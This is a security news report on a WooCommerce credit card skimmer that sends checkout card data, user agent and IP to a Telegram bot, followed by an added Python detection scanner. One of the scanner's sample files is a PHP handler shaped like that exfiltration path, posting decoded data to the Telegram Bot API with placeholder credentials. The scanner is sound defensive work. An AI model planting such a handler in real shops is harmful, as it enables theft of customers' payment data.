A WooCommerce credit card skimmer has been observed using a Telegram bot to exfiltrate stolen data. The skimmer was spotted after multiple cases of credit card theft were reported on an eCommerce website.
A skimmer on the website
At first, the website owner received complaints from multiple customers who reported bogus transactions on their cards shortly after making a payment on the website.
Just three days after the first case of credit card theft was reported, an investigation was launched. Researchers observed that a number of files had been modified over the weekend.
They quickly discovered two files containing a credit card skimmer.
The payload was attached to the Place Order button on the checkout page of the website. It uses the Telegram API to send the exfiltrated card details to the attacker's server via CURL.
The payload and Telegram
The first portion of the credit card skimmer was found inside the script[.]js file, a custom file added to the well-known Storefront WooCommerce theme and loaded on the checkout page.
As soon as an order is placed on the infected website, the credit card details are sent to a Telegram chat. They are subsequently sold on the black market, which results in bogus transactions on the cards.
The script.js file
The file performs the following actions:
It takes the input it receives and appends the visitor's user agent and IP address.
It then decodes the base64-encoded content and uses the Telegram API to send that content to a designated chat bot through CURL.
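The behaviour described above (visitor details appended, base64 content decoded, curl posting to the Telegram Bot API) gives a defender a concrete set of indicators to scan theme files for. The following scanner is an added example, not code from the original report or from the skimmer itself; the file names, indicator names and sample file contents are constructed for illustration.

```python
import re
from typing import Dict, List

# Indicator patterns for Telegram-based exfiltration from a WooCommerce checkout
# handler, derived from the behaviour described above: visitor details are
# appended, base64 content is decoded, and curl posts to the Telegram Bot API.
INDICATORS: Dict[str, re.Pattern] = {
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot", re.I),
    "telegram_send": re.compile(r"sendMessage|chat_id", re.I),
    "base64_decode": re.compile(r"base64_decode\s*\(|atob\s*\(", re.I),
    "curl_usage": re.compile(r"curl_(init|exec|setopt)\s*\(", re.I),
    "visitor_fingerprint": re.compile(r"HTTP_USER_AGENT|REMOTE_ADDR", re.I),
    "checkout_hook": re.compile(r"place_order|checkout", re.I),
}

# Indicators that together form the exfiltration path; matching all three is the
# high-confidence condition, while partial matches are reported for manual review.
EXFIL_CHAIN = ("telegram_bot_api", "base64_decode", "curl_usage")

def scan_source(name: str, source: str) -> Dict[str, object]:
    """Match one file's contents against every indicator."""
    hits: List[str] = [k for k, rx in INDICATORS.items() if rx.search(source)]
    chain_complete = all(k in hits for k in EXFIL_CHAIN)
    return {"file": name, "hits": hits, "exfil_chain": chain_complete}

def scan_files(files: Dict[str, str]) -> List[Dict[str, object]]:
    """Return findings for every file that matches at least one indicator."""
    return [f for f in (scan_source(n, s) for n, s in files.items()) if f["hits"]]

# Constructed samples (not the real skimmer): a benign checkout script, a PHP
# handler shaped like the described exfiltration path, and an unrelated file.
SAMPLES = {
    "storefront/js/checkout.js": "jQuery('#place_order').on('click', function(){ validateForm(); });",
    "storefront/inc/handler.php": (
        "<?php $d = $_POST['d'] . ' ' . $_SERVER['HTTP_USER_AGENT'] . ' ' . $_SERVER['REMOTE_ADDR'];"
        " $m = base64_decode($d);"
        " $c = curl_init('https://api.telegram.org/bot<TOKEN>/sendMessage');"
        " curl_setopt($c, CURLOPT_POSTFIELDS, ['chat_id' => '<ID>', 'text' => $m]); curl_exec($c);"
    ),
    "storefront/style.css": "body { margin: 0; }",
}

if __name__ == "__main__":
    for finding in scan_files(SAMPLES):
        flag = "EXFIL CHAIN" if finding["exfil_chain"] else "review"
        print(f"{flag:11} {finding['file']}: {', '.join(finding['hits'])}")
```

Run it against a copy of the theme directory (reading each file into the dictionary) and treat any file that completes the chain as a candidate for the second skimmer component; a lone checkout hook match is expected in a legitimate theme.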
WooCommerce has now become one of the CMS platforms most targeted by credit card skimming malware. eCommerce website owners are therefore advised to keep all their software up to date, use strong passwords and firewall services, and protect the admin panel from unauthorized access.